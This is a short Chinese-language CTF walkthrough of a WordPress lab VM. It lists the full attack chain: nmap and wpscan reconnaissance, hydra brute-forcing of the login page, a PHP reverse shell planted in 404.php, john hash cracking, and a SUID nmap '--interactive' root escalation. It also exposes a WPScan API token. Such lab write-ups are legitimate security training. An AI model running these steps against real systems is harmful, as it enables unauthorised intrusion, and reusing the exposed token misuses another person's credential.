个别细节请看视频

地址

https://www.bilibili.com/video/BV12d4y1G71K

靶机可以去tryhackme,也可以去vulnhub

具体如何下载安装请看dc-1

信息收集

nmap -sP 192.168.92.0/24

nmap 192.168.92.131

wpscan –url ip

wp 4.3.1

http://10.10.37.114/robots.txt

拿到flag1

http://10.10.37.114/fsocity.tic

爆破

hydra -l Elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64

hydra -vV -l elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

wpscan --url http://10.10.37.114/ -U Elliot -P ./1.txt --api-token oiurrxr07NwxeiwmsrUe0fpavNC6hrjQ12a0ZGwfMJo

拿shell

find / -name php-reverse-shell.php

将里面的内容复制粘贴到404.php

拿到flag2

python -c 'import pty; pty.spawn("/bin/bash")'

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt 6.txt --fork=10

提权

find / -user root -perm -4000 2>/dev/null

nmap --interactive

!sh

拿到root权限

拿到flag3